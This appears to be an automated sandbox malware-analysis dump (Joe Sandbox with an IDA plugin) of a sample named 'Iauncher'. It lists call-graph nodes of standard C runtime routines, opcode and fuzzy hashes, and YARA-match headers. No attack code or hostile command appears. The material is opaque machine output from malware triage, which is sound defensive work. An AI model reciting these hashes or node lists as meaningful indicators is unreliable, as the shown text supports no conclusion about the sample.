17364->17365 17366 56e2e0 __dosmaperr 12 API calls 17365->17366 17366->17363 17368 5709c7 17367->17368 17369 574339 __Getctype 14 API calls 17368->17369 17370 5709ee 17369->17370 17371 5709f6 17370->17371 17377 570a00 17370->17377 17372 574396 ___free_lconv_mon 14 API calls 17371->17372 17373 570988 17372->17373 17373->17322 17374 570a5d 17375 574396 ___free_lconv_mon 14 API calls 17374->17375 17375->17373 17376 574339 __Getctype 14 API calls 17376->17377 17377->17374 17377->17376 17378 570a6c 17377->17378 17383 570a87 17377->17383 17385 574396 ___free_lconv_mon 14 API calls 17377->17385 17940 572c88 17377->17940 17949 570a94 17378->17949 17382 574396 ___free_lconv_mon 14 API calls 17384 570a79 17382->17384 17955 56acfc IsProcessorFeaturePresent 17383->17955 17388 574396 ___free_lconv_mon 14 API calls 17384->17388 17385->17377 17387 570a93 17388->17373 17390 5731a6 17389->17390 17391 5731ac 17389->17391 17437 575c98 17390->17437 17411 5731b2 17391->17411 17442 575cd7 17391->17442 17399 5731f3 17402 575cd7 __Getctype 6 API calls 17399->17402 17400 5731de 17401 575cd7 __Getctype 6 API calls 17400->17401 17403 5731ea 17401->17403 17404 5731ff 17402->17404 17409 574396 ___free_lconv_mon 14 API calls 17403->17409 17405 573203 17404->17405 17406 573212 17404->17406 17407 575cd7 __Getctype 6 API calls 17405->17407 17456 572f0e 17406->17456 17407->17403 17409->17411 17413 5731b7 17411->17413 17461 5700d9 17411->17461 17414 579e6a 17413->17414 17742 579fbf 17414->17742 17419 579ead 17419->17335 17422 579ec6 17425 574396 ___free_lconv_mon 14 API calls 17422->17425 17423 579ed4 17767 57a0ba 17423->17767 17425->17419 17472 575a87 17437->17472 17440 575ccf TlsGetValue 17441 575cbd 17441->17391 17443 575a87 std::_Lockit::_Lockit 5 API calls 17442->17443 17444 575cf3 17443->17444 17445 575d11 TlsSetValue 17444->17445 17446 5731c6 17444->17446 17446->17411 17447 574339 17446->17447 17448 574346 17447->17448 17449 574386 17448->17449 17450 574371 HeapAlloc 17448->17450 17451 57435a 
__Getctype 17448->17451 17490 56e2e0 17449->17490 17450->17451 17452 574384 17450->17452 17451->17449 17451->17450 17487 5703b0 17451->17487 17454 5731d6 17452->17454 17454->17399 17454->17400 17527 572da2 17456->17527 17629 578cfb 17461->17629 17465 570112 17467 570f58 std::locale::_Setgloballocale 23 API calls 17465->17467 17466 5700f3 IsProcessorFeaturePresent 17469 5700ff 17466->17469 17470 57011c 17467->17470 17468 5700e9 17468->17465 17468->17466 17659 56aad3 17469->17659 17473 575ab5 17472->17473 17477 575ab1 17472->17477 17473->17477 17479 5759bc 17473->17479 17476 575acf GetProcAddress 17476->17477 17478 575adf std::_Lockit::_Lockit 17476->17478 17477->17440 17477->17441 17478->17477 17485 5759cd ___vcrt_FlsFree 17479->17485 17480 575a63 17480->17476 17480->17477 17481 5759eb LoadLibraryExW 17482 575a06 GetLastError 17481->17482 17483 575a6a 17481->17483 17482->17485 17483->17480 17484 575a7c FreeLibrary 17483->17484 17484->17480 17485->17480 17485->17481 17486 575a39 LoadLibraryExW 17485->17486 17486->17483 17486->17485 17493 5703dd 17487->17493 17504 573231 GetLastError 17490->17504 17492 56e2e5 17492->17454 17494 5703e9 __FrameHandler3::FrameUnwindToState 17493->17494 17499 56d9e4 EnterCriticalSection 17494->17499 17496 5703f4 17500 570430 17496->17500 17499->17496 17503 56da2c LeaveCriticalSection 17500->17503 17502 5703bb 17502->17451 17503->17502 17505 573247 17504->17505 17508 57324d 17504->17508 17506 575c98 __Getctype 6 API calls 17505->17506 17506->17508 17507 575cd7 __Getctype 6 API calls 17509 573269 17507->17509 17508->17507 17525 573251 SetLastError 17508->17525 17510 574339 __Getctype 12 API calls 17509->17510 17509->17525 17512 57327e 17510->17512 17513 573297 17512->17513 17514 573286 17512->17514 17516 575cd7 __Getctype 6 API calls 17513->17516 17515 575cd7 __Getctype 6 API calls 17514->17515 17517 573294 17515->17517 17518 5732a3 17516->17518 17522 574396 ___free_lconv_mon 12 API calls 17517->17522 17519 5732a7 17518->17519 17520 5732be 
17518->17520 17521 575cd7 __Getctype 6 API calls 17519->17521 17523 572f0e __Getctype 12 API calls 17520->17523 17521->17517 17522->17525 17524 5732c9 17523->17524 17526 574396 ___free_lconv_mon 12 API calls 17524->17526 17525->17492 17526->17525 17528 572dae __FrameHandler3::FrameUnwindToState 17527->17528 17541 56d9e4 EnterCriticalSection 17528->17541 17530 572db8 17542 572de8 17530->17542 17533 572eb4 17541->17530 17545 56da2c LeaveCriticalSection 17542->17545 17544 572dd6 17544->17533 17545->17544 17665 578c2d 17629->17665 17632 578d40 17633 578d4c __FrameHandler3::FrameUnwindToState 17632->17633 17634 573231 __dosmaperr 14 API calls 17633->17634 17637 578d79 std::locale::_Setgloballocale 17633->17637 17640 578d73 std::locale::_Setgloballocale 17633->17640 17634->17640 17635 578dc0 17636 56e2e0 __dosmaperr 14 API calls 17635->17636 17638 578dc5 17636->17638 17639 578dec 17637->17639 17679 56d9e4 EnterCriticalSection 17637->17679 17676 56accf 17638->17676 17644 578f1f 17639->17644 17645 578e2e 17639->17645 17655 578e5d 17639->17655 17640->17635 17640->17637 17658 578daa 17640->17658 17647 578f2a 17644->17647 17711 56da2c LeaveCriticalSection 17644->17711 17645->17655 17680 5730e0 GetLastError 17645->17680 17649 570f58 std::locale::_Setgloballocale 23 API calls 17647->17649 17650 578f32 17649->17650 17652 5730e0 __Getctype 41 API calls 17656 578eb2 17652->17656 17654 5730e0 __Getctype 41 API calls 17654->17655 17707 578ecc 17655->17707 17657 5730e0 __Getctype 41 API calls 17656->17657 17656->17658 17657->17658 17658->17468 17660 56aaef codecvt std::locale::_Setgloballocale 17659->17660 17661 56ab1b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17660->17661 17662 56abec std::locale::_Setgloballocale 17661->17662 17734 5662ac 17662->17734 17664 56ac0a 17664->17465 17666 578c39 __FrameHandler3::FrameUnwindToState 17665->17666 17671 56d9e4 EnterCriticalSection 17666->17671 17668 578c47 17672 578c85 17668->17672 17671->17668 17675 56da2c 
LeaveCriticalSection 17672->17675 17674 5700de 17674->17468 17674->17632 17675->17674 17712 56ac1b 17676->17712 17679->17639 17681 5730f6 17680->17681 17682 5730fc 17680->17682 17683 575c98 __Getctype 6 API calls 17681->17683 17684 575cd7 __Getctype 6 API calls 17682->17684 17704 573100 SetLastError 17682->17704 17683->17682 17685 573118 17684->17685 17687 574339 __Getctype 14 API calls 17685->17687 17685->17704 17690 57312d 17687->17690 17688 573195 17691 5700d9 __purecall 39 API calls 17688->17691 17689 573190 17689->17654 17692 573146 17690->17692 17693 573135 17690->17693 17695 57319a 17691->17695 17704->17688 17704->17689 17708 578ed2 17707->17708 17709 578ea3 17707->17709 17733 56da2c LeaveCriticalSection 17708->17733 17709->17652 17709->17656 17709->17658 17711->17647 17713 56ac2d _Fputc 17712->17713 17718 56ac52 17713->17718 17719 56ac62 17718->17719 17720 56ac69 17718->17720 17721 56aa70 _Fputc 16 API calls 17719->17721 17722 56aa47 _Deallocate GetLastError SetLastError 17720->17722 17724 56ac45 17720->17724 17721->17720 17733->17709 17735 5662b4 17734->17735 17736 5662b5 IsProcessorFeaturePresent 17734->17736 17735->17664 17738 566ad2 17736->17738 17741 566a95 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17738->17741 17740 566bb5 17740->17664 17741->17740 17743 579fcb __FrameHandler3::FrameUnwindToState 17742->17743 17750 579fe5 17743->17750 17786 56d9e4 EnterCriticalSection 17743->17786 17745 57a021 17787 57a03e 17745->17787 17747 5700d9 __purecall 41 API calls 17751 57a05e 17747->17751 17748 579e94 17753 579bea 17748->17753 17749 579ff5 17749->17745 17752 574396 ___free_lconv_mon 14 API calls 17749->17752 17750->17747 17750->17748 17752->17745 17791 56fb3a 17753->17791 17756 579c1d 17758 579c34 17756->17758 17759 579c22 GetACP 17756->17759 17757 579c0b GetOEMCP 17757->17758 17758->17419 17760 5745c0 17758->17760 17759->17758 17761 5745fe 17760->17761 17766 5745ce __Getctype 17760->17766 17762 56e2e0 __dosmaperr 
14 API calls 17761->17762 17764 5745fc 17762->17764 17763 5745e9 RtlAllocateHeap 17763->17764 17763->17766 17764->17422 17764->17423 17765 5703b0 std::ios_base::_Init 2 API calls 17765->17766 17766->17761 17766->17763 17766->17765 17768 579bea 43 API calls 17767->17768 17769 57a0da 17768->17769 17770 57a117 IsValidCodePage 17769->17770 17776 57a153 codecvt 17769->17776 17773 57a129 17770->17773 17770->17776 17771 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17776->17771 17786->17749 17790 56da2c LeaveCriticalSection 17787->17790 17789 57a045 17789->17750 17790->17789 17792 56fb51 17791->17792 17793 56fb58 17791->17793 17792->17756 17792->17757 17793->17792 17794 5730e0 __Getctype 41 API calls 17793->17794 17795 56fb79 17794->17795 17799 574504 17795->17799 17800 574517 17799->17800 17802 56fb8f 17799->17802 17800->17802 17807 57b9f5 17800->17807 17803 574562 17802->17803 17804 574575 17803->17804 17805 57458a 17803->17805 17804->17805 17828 57a0a7 17804->17828 17805->17792 17808 57ba01 __FrameHandler3::FrameUnwindToState 17807->17808 17809 5730e0 __Getctype 41 API calls 17808->17809 17810 57ba0a 17809->17810 17811 57ba50 17810->17811 17820 56d9e4 EnterCriticalSection 17810->17820 17811->17802 17813 57ba28 17821 57ba76 17813->17821 17820->17813 17822 57ba39 17821->17822 17823 57ba84 __Getctype 17821->17823 17823->17822 17829 5730e0 __Getctype 41 API calls 17828->17829 17830 57a0ac 17829->17830 17831 579fbf __strnicoll 41 API calls 17830->17831 17832 57a0b7 17831->17832 17832->17805 17941 572ca4 17940->17941 17942 572c96 17940->17942 17943 56e2e0 __dosmaperr 14 API calls 17941->17943 17942->17941 17946 572cbc 17942->17946 17948 572cac 17943->17948 17944 56accf __strnicoll 41 API calls 17945 572cb6 17944->17945 17945->17377 17946->17945 17947 56e2e0 __dosmaperr 14 API calls 17946->17947 17947->17948 17948->17944 17950 570aa1 17949->17950 17951 570a72 17949->17951 17952 570ab8 17950->17952 17953 574396 ___free_lconv_mon 14 API calls 17950->17953 
17951->17382 17954 574396 ___free_lconv_mon 14 API calls 17952->17954 17953->17950 17954->17951 17956 56ad08 17955->17956 17957 56aad3 std::locale::_Setgloballocale 8 API calls 17956->17957 17958 56ad1d GetCurrentProcess TerminateProcess 17957->17958 17958->17387 17960 561f64 _strlen 17959->17960 17998 5611cf 17960->17998 17962 561f71 17963 56626e 17962->17963 17965 566273 17963->17965 17964 56da5a ___std_exception_copy 15 API calls 17964->17965 17965->17964 17966 56628d 17965->17966 17967 5703b0 std::ios_base::_Init 2 API calls 17965->17967 17969 5632ce Concurrency::cancel_current_task 17965->17969 17966->17185 17983 583000 17966->17983 17967->17965 17968 566299 17968->17968 17969->17968 17970 568e4c CallUnexpected RaiseException 17969->17970 17971 5632ea std::ios_base::_Init 17970->17971 17972 568e4c CallUnexpected RaiseException 17971->17972 17973 563307 17972->17973 17974 56ac1b _Deallocate 41 API calls 17973->17974 17975 56acee 17974->17975 17976 56acfc _Deallocate 11 API calls 17975->17976 17977 56acfb 17976->17977 18060 5833c3 17978->18060 17984 5830fa 17983->17984 17993 583030 17983->17993 18597 563333 17984->18597 17986 561f47 43 API calls std::ios_base::_Init 17986->17993 17988 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 17989 583114 17988->17989 17989->17185 17990 56405f 43 API calls 17990->17993 17991 56b91e 44 API calls 17991->17993 17992 563359 41 API calls std::ios_base::_Init 17992->17993 17993->17984 17993->17986 17993->17990 17993->17991 17993->17992 17999 56123a 17998->17999 18001 5611e0 std::ios_base::_Init 17998->18001 18013 5633a8 17999->18013 18004 5611e7 std::ios_base::_Init 18001->18004 18005 56116b 18001->18005 18004->17962 18006 561176 18005->18006 18007 56117e 18005->18007 18018 56118d 18006->18018 18009 56118a 18007->18009 18010 56626e std::ios_base::_Init 43 API calls 18007->18010 18009->18004 18012 561188 18010->18012 18012->18004 18034 564438 18013->18034 18019 5632ce Concurrency::cancel_current_task 18018->18019 
18020 56119c 18018->18020 18031 568e4c 18019->18031 18021 56626e std::ios_base::_Init 43 API calls 18020->18021 18022 5611a2 18021->18022 18024 56117c 18022->18024 18026 56ac1b _Deallocate 41 API calls 18022->18026 18024->18004 18025 5632ea std::ios_base::_Init 18029 568e4c CallUnexpected RaiseException 18025->18029 18027 56acee 18026->18027 18028 56acfc _Deallocate 11 API calls 18027->18028 18030 56acfb 18028->18030 18029->18022 18032 568e66 18031->18032 18033 568e93 RaiseException 18031->18033 18032->18033 18033->18025 18039 56435b 18034->18039 18037 568e4c CallUnexpected RaiseException 18038 564457 18037->18038 18042 5621a0 18039->18042 18045 568dca 18042->18045 18046 5621cc 18045->18046 18047 568dd7 18045->18047 18046->18037 18047->18046 18053 56da5a 18047->18053 18050 568e04 18052 56aefa __freea 14 API calls 18050->18052 18051 572c88 ___std_exception_copy 41 API calls 18051->18050 18052->18046 18057 5745c0 __Getctype 18053->18057 18054 5745fe 18055 56e2e0 __dosmaperr 14 API calls 18054->18055 18058 568df4 18055->18058 18056 5745e9 RtlAllocateHeap 18056->18057 18056->18058 18057->18054 18057->18056 18059 5703b0 std::ios_base::_Init 2 API calls 18057->18059 18058->18050 18058->18051 18059->18057 18061 5833a9 18060->18061 18063 5833d1 18060->18063 18065 5831de 18061->18065 18063->18061 18081 562454 18063->18081 18091 561d5b 18063->18091 18523 5611b8 18065->18523 18068 561f47 std::ios_base::_Init 43 API calls 18069 583229 18068->18069 18526 5613ec 18069->18526 18071 583244 18072 563359 std::ios_base::_Init 41 API calls 18071->18072 18073 58324d 18072->18073 18074 583375 18073->18074 18536 561474 18073->18536 18546 5613c0 18073->18546 18550 561537 18074->18550 18082 562460 __EH_prolog3_catch 18081->18082 18098 562247 18082->18098 18085 562499 std::ios_base::_Ios_base_dtor 18117 5634b8 18085->18117 18090 562543 std::ios_base::_Init 18090->18063 18370 5641cf 18091->18370 18093 561d6e 18374 56409b 18093->18374 18100 562256 18098->18100 18099 562274 18099->18085 18102 
561dfd 18099->18102 18100->18099 18129 563ee5 18100->18129 18137 5642b1 18102->18137 18106 561e21 18116 561e34 18106->18116 18149 562a25 18106->18149 18111 561e70 18112 561e4b 18157 5645fc 18112->18157 18160 564309 18116->18160 18118 56253b 18117->18118 18119 5634cf std::ios_base::_Init 18117->18119 18124 562413 18118->18124 18123 563508 18119->18123 18298 5621ed 18119->18298 18120 568e4c CallUnexpected RaiseException 18121 563521 18120->18121 18123->18120 18352 564498 18124->18352 18126 56241b 18127 5623d4 18126->18127 18356 563185 18126->18356 18127->18090 18130 563ef1 __EH_prolog3_catch 18129->18130 18131 563f96 std::ios_base::_Init 18130->18131 18132 562247 51 API calls 18130->18132 18131->18099 18135 563f10 18132->18135 18133 563f8e 18134 562413 51 API calls 18133->18134 18134->18131 18135->18133 18136 5634b8 std::ios_base::_Init 43 API calls 18135->18136 18136->18133 18138 5642c7 18137->18138 18139 5642c0 18137->18139 18142 561e0e 18138->18142 18180 566020 EnterCriticalSection 18138->18180 18175 56da43 18139->18175 18143 562577 18142->18143 18144 5625a7 18143->18144 18145 562583 18143->18145 18144->18106 18146 5642b1 std::_Lockit::_Lockit 7 API calls 18145->18146 18147 56258d 18146->18147 18148 564309 std::_Lockit::~_Lockit 2 API calls 18147->18148 18148->18144 18150 561e44 18149->18150 18151 562a39 18149->18151 18150->18111 18150->18112 18151->18150 18152 56626e std::ios_base::_Init 43 API calls 18151->18152 18161 564313 18160->18161 18162 56da51 18160->18162 18181 575eef 18175->18181 18180->18142 18202 57589e 18181->18202 18203 575a87 std::_Lockit::_Lockit 5 API calls 18202->18203 18204 5758b4 18203->18204 18205 5758b8 18204->18205 18206 575a87 std::_Lockit::_Lockit 5 API calls 18205->18206 18301 5622a7 18298->18301 18302 561f47 std::ios_base::_Init 43 API calls 18301->18302 18303 5622c6 18302->18303 18310 562072 18303->18310 18321 561f13 18310->18321 18322 561f33 18321->18322 18352->18126 18353 569267 18352->18353 18360 56970c 18353->18360 18355 56926c 
18355->18126 18357 563191 __EH_prolog3_catch 18356->18357 18358 5631cd std::ios_base::_Init 18357->18358 18359 5634b8 std::ios_base::_Init 43 API calls 18357->18359 18358->18127 18359->18358 18361 569715 18360->18361 18362 569718 GetLastError 18360->18362 18361->18355 18365 56a883 18362->18365 18366 56a722 ___vcrt_FlsFree 5 API calls 18365->18366 18371 5641e3 18370->18371 18384 561d84 18371->18384 18373 5641ec std::ios_base::_Ios_base_dtor 18373->18093 18375 5640a7 __EH_prolog3_catch 18374->18375 18385 5642b1 std::_Lockit::_Lockit 7 API calls 18384->18385 18386 561d95 18385->18386 18387 562577 int 9 API calls 18386->18387 18390 561da8 18387->18390 18388 561dbb 18389 564309 std::_Lockit::~_Lockit 2 API calls 18388->18389 18391 561df1 18389->18391 18390->18388 18399 5629c0 18390->18399 18391->18373 18394 561df7 18396 5632eb 42 API calls 18394->18396 18395 561dd2 18397 5645fc std::_Facet_Register 43 API calls 18395->18397 18398 561dfc 18396->18398 18397->18388 18400 5629d4 18399->18400 18401 561dcb 18399->18401 18400->18401 18402 56626e std::ios_base::_Init 43 API calls 18400->18402 18401->18394 18401->18395 18403 5629e0 codecvt 18402->18403 18404 562a09 18403->18404 18405 561ff9 codecvt 72 API calls 18403->18405 18404->18401 18406 562357 std::_Locinfo::~_Locinfo 69 API calls 18404->18406 18407 5629f8 18405->18407 18406->18401 18409 562ba1 18407->18409 18524 56626e std::ios_base::_Init 43 API calls 18523->18524 18525 5611bf 18524->18525 18525->18068 18527 561403 18526->18527 18528 56141d 18527->18528 18529 561431 18527->18529 18530 56146e 18527->18530 18528->18071 18553 561100 18529->18553 18562 563308 18530->18562 18537 561480 __EH_prolog3_catch 18536->18537 18538 5614a0 18537->18538 18539 56152c 18537->18539 18547 5613cd 18546->18547 18549 5613da std::ios_base::_Ios_base_dtor 18546->18549 18582 56277d 18547->18582 18549->18073 18589 561557 18550->18589 18554 56626e std::ios_base::_Init 43 API calls 18553->18554 18555 561116 18554->18555 18556 561f13 
std::ios_base::_Init 43 API calls 18555->18556 18557 561129 18556->18557 18558 5622f6 18557->18558 18563 564438 std::ios_base::_Init 43 API calls 18562->18563 18564 563312 18563->18564 18598 56334b 18597->18598 18599 56333b 18597->18599 18598->17988 18600 5613c0 _Deallocate 41 API calls 18599->18600 18600->18598 18602 570dbb 18601->18602 18603 570da9 18601->18603 18613 570c44 18602->18613 18628 570e44 GetModuleHandleW 18603->18628 18607 5665dd 18607->17218 18614 570c50 __FrameHandler3::FrameUnwindToState 18613->18614 18636 56d9e4 EnterCriticalSection 18614->18636 18616 570c5a 18637 570c91 18616->18637 18618 570c67 18641 570c85 18618->18641 18621 570e13 18666 570e87 18621->18666 18624 570e31 18626 570ea9 std::locale::_Setgloballocale 3 API calls 18624->18626 18625 570e21 GetCurrentProcess TerminateProcess 18625->18624 18627 570e39 ExitProcess 18626->18627 18629 570dae 18628->18629 18629->18602 18630 570ea9 GetModuleHandleExW 18629->18630 18631 570f09 18630->18631 18632 570ee8 GetProcAddress 18630->18632 18634 570f0f FreeLibrary 18631->18634 18635 570dba 18631->18635 18632->18631 18633 570efc 18632->18633 18633->18631 18634->18635 18635->18602 18636->18616 18638 570c9d __FrameHandler3::FrameUnwindToState 18637->18638 18639 570d04 std::locale::_Setgloballocale 18638->18639 18644 572a16 18638->18644 18639->18618 18665 56da2c LeaveCriticalSection 18641->18665 18643 570c73 18643->18607 18643->18621 18645 572a22 __EH_prolog3 18644->18645 18648 57276e 18645->18648 18647 572a49 std::ios_base::_Init 18647->18639 18649 57277a __FrameHandler3::FrameUnwindToState 18648->18649 18656 56d9e4 EnterCriticalSection 18649->18656 18651 572788 18657 572926 18651->18657 18656->18651 18658 572795 18657->18658 18659 572945 18657->18659 18661 5727bd 18658->18661 18659->18658 18660 574396 ___free_lconv_mon 14 API calls 18659->18660 18660->18658 18664 56da2c LeaveCriticalSection 18661->18664 18663 5727a6 18663->18647 18664->18663 18665->18643 18671 57a789 GetPEB 18666->18671 18669 570e91 
GetPEB 18670 570e1d 18669->18670 18670->18624 18670->18625 18672 57a7a3 18671->18672 18674 570e8c 18671->18674 18675 575b0a 18672->18675 18674->18669 18674->18670 18676 575a87 std::_Lockit::_Lockit 5 API calls 18675->18676 18677 575b26 18676->18677 18677->18674 21516 565b60 21517 565b9e 21516->21517 21518 565b69 21516->21518 21518->21517 21521 56ef7b 21518->21521 21520 565b91 21522 56ef8d 21521->21522 21526 56ef96 ___scrt_uninitialize_crt 21521->21526 21523 56edff ___scrt_uninitialize_crt 70 API calls 21522->21523 21524 56ef93 21523->21524 21524->21520 21525 56efa7 21525->21520 21526->21525 21529 56ed9f 21526->21529 21530 56edab __FrameHandler3::FrameUnwindToState 21529->21530 21537 56e417 EnterCriticalSection 21530->21537 21532 56edb9 21533 56ef0d ___scrt_uninitialize_crt 70 API calls 21532->21533 21534 56edca 21533->21534 21538 56edf3 21534->21538 21537->21532 21541 56e42b LeaveCriticalSection 21538->21541 21540 56eddc 21540->21520 21541->21540 21688 565b05 21689 565b14 21688->21689 21691 565b38 21689->21691 21692 56f994 21689->21692 21693 56f9a7 _Fputc 21692->21693 21698 56f8cb 21693->21698 21695 56f9bc 21696 56aa0b _Fputc 41 API calls 21695->21696 21697 56f9c9 21696->21697 21697->21691 21699 56f8dd 21698->21699 21702 56f900 21698->21702 21700 56ac52 _Deallocate 29 API calls 21699->21700 21701 56f8f8 21700->21701 21701->21695 21702->21699 21703 56f927 21702->21703 21706 56f7d0 21703->21706 21707 56f7dc __FrameHandler3::FrameUnwindToState 21706->21707 21714 56e417 EnterCriticalSection 21707->21714 21709 56f7ea 21715 56f82b 21709->21715 21711 56f7f7 21724 56f81f 21711->21724 21714->21709 21716 56eea4 ___scrt_uninitialize_crt 66 API calls 21715->21716 21717 56f846 21716->21717 21727 576d01 21717->21727 21720 574339 __Getctype 14 API calls 21721 56f88f 21720->21721 21722 574396 ___free_lconv_mon 14 API calls 21721->21722 21723 56f86b 21722->21723 21723->21711 21731 56e42b LeaveCriticalSection 21724->21731 21726 56f808 21726->21695 21728 56f850 21727->21728 21729 
576d18 21727->21729 21728->21720 21728->21723 21729->21728 21730 574396 ___free_lconv_mon 14 API calls 21729->21730 21730->21728 21731->21726 21857 5713d2 21860 57109e 21857->21860 21861 5710aa __FrameHandler3::FrameUnwindToState 21860->21861 21868 56d9e4 EnterCriticalSection 21861->21868 21863 5710b4 21864 5710e2 21863->21864 21866 57ba76 __Getctype 14 API calls 21863->21866 21869 571100 21864->21869 21866->21863 21868->21863 21872 56da2c LeaveCriticalSection 21869->21872 21871 5710ee 21872->21871 18907 562dd1 18908 562e03 18907->18908 18909 561d84 73 API calls 18908->18909 18910 562e59 std::ios_base::_Ios_base_dtor 18909->18910 18939 561fa0 18910->18939 18914 562f60 18917 562fb6 18914->18917 18918 562f67 18914->18918 18915 563008 18919 5631e2 70 API calls 18915->18919 18916 562f24 18916->18914 18916->18915 18921 5631e2 70 API calls 18917->18921 18968 563217 18918->18968 18922 562fb1 18919->18922 18924 562fd9 18921->18924 18957 5631e2 18922->18957 18928 563217 70 API calls 18924->18928 18926 5631e2 70 API calls 18926->18922 18927 562ea9 std::ios_base::_Ios_base_dtor 18927->18916 18961 563fa3 18927->18961 18928->18922 18931 563217 70 API calls 18932 563098 18931->18932 18933 563359 std::ios_base::_Init 41 API calls 18932->18933 18934 5630a4 18933->18934 18972 56337f 18934->18972 18937 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 18938 5630be 18937->18938 18976 561323 18939->18976 18941 561fc1 18942 561e76 18941->18942 18943 5642b1 std::_Lockit::_Lockit 7 API calls 18942->18943 18944 561e87 18943->18944 18945 562577 int 9 API calls 18944->18945 18946 561e9a 18945->18946 18956 561ead 18946->18956 18990 562a82 18946->18990 18947 564309 std::_Lockit::~_Lockit 2 API calls 18949 561ee3 18947->18949 18949->18927 18951 561ec4 18953 5645fc std::_Facet_Register 43 API calls 18951->18953 18952 561ee9 18954 5632eb 42 API calls 18952->18954 18953->18956 18955 561eee 18954->18955 18956->18947 18958 563068 18957->18958 18959 5631ed 18957->18959 18958->18931 
18959->18958 19056 56242e 18959->19056 18962 563fb4 18961->18962 18963 56400e 18961->18963 18966 563fc0 18962->18966 19060 561ac5 18962->19060 19069 5633be 18963->19069 18966->18927 18969 562f7f 18968->18969 18970 563222 18968->18970 18969->18926 18970->18969 18971 56242e 70 API calls 18970->18971 18971->18970 18973 5630ad 18972->18973 18974 563388 18972->18974 18973->18937 18975 56287b 41 API calls 18974->18975 18975->18973 18977 561398 18976->18977 18981 561334 18976->18981 18978 5633a8 std::ios_base::_Init 43 API calls 18977->18978 18979 56139d 18978->18979 18980 56133b 18980->18941 18981->18980 18983 5633e7 18981->18983 18984 5633f2 18983->18984 18985 5633fe 18983->18985 18986 56116b std::ios_base::_Init 43 API calls 18984->18986 18987 5632ce Concurrency::cancel_current_task 42 API calls 18985->18987 18989 5633fa 18986->18989 18988 563403 18987->18988 18989->18980 18991 561ebd 18990->18991 18992 562a96 18990->18992 18991->18951 18991->18952 18992->18991 18993 56626e std::ios_base::_Init 43 API calls 18992->18993 18995 562aa2 codecvt 18993->18995 18994 562acd 18994->18991 18996 562357 std::_Locinfo::~_Locinfo 69 API calls 18994->18996 18995->18994 18997 561ff9 codecvt 72 API calls 18995->18997 18996->18991 18998 562aba 18997->18998 19000 562bda 18998->19000 19019 56d97b 19000->19019 19003 5648ac codecvt 41 API calls 19004 562c05 19003->19004 19005 5648ac codecvt 41 API calls 19004->19005 19006 562c38 19005->19006 19024 5619d8 19006->19024 19008 562c44 19029 561a14 19008->19029 19011 561a14 17 API calls 19012 562c6d 19011->19012 19013 562c9b 19012->19013 19039 5619a7 19012->19039 19016 5662ac __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 19013->19016 19018 562cc9 19016->19018 19017 5619a7 16 API calls 19017->19013 19018->18994 19020 5730e0 __Getctype 41 API calls 19019->19020 19021 56d986 19020->19021 19022 574504 __Getctype 41 API calls 19021->19022 19023 562bf9 19022->19023 19023->19003 19025 5619e3 __Getctype _strlen 19024->19025 19028 5619f7 codecvt 
Memory Dump Source
• Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
• Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
• Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
• Instruction ID: f7f2dfd2968e96a752f50a4316494520d8aaf1e3d46847255f723b651c777065
• Opcode Fuzzy Hash: 4712b80276cd771b58b8e09bf769c485b2bc14740f32cbc8fff33ad459dada42
• Instruction Fuzzy Hash: 1FE08C72912228EBCB19DBC8D90898AF7FCFB84B00B1188A6F50AD3201D2B0DE00D7D0
Uniqueness
Uniqueness Score: -1.00%

Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
• Instruction ID: 5c94c5bb7f2b5dd1d20e19cffa3d298a53f6880de57231a53dcef7169ea5997e
• Opcode Fuzzy Hash: eedd12195004b50f187168fbc7ef43d299e5fc9ab837594ef173dd7107a705ca
• Instruction Fuzzy Hash: 78C08C74010A10CBCF298910A371BBA37A8F3D6782F806C8CC84A0B682D51EAC82F601
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (legend: Executed / Not Executed)
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,940D2BD2,?,00575AC9,?,?,00000000,00000000), ref: 00575A7D
Strings
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                    • Opcode ID: 983ec614eabb1074214c8524db80e8d0e48f87299a8e29ded99b38efc0c4860d
                                                                                                                                                    • Instruction ID: b84c1242fdbea7eda980ab697b976c7b6d7f5eac478a713b38ad3eba91998bec
                                                                                                                                                    • Opcode Fuzzy Hash: 983ec614eabb1074214c8524db80e8d0e48f87299a8e29ded99b38efc0c4860d
                                                                                                                                                    • Instruction Fuzzy Hash: 53210832A01611EBC7229B64FC84A5A3F58FB55762F248230ED1DB7290F670EE04E7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
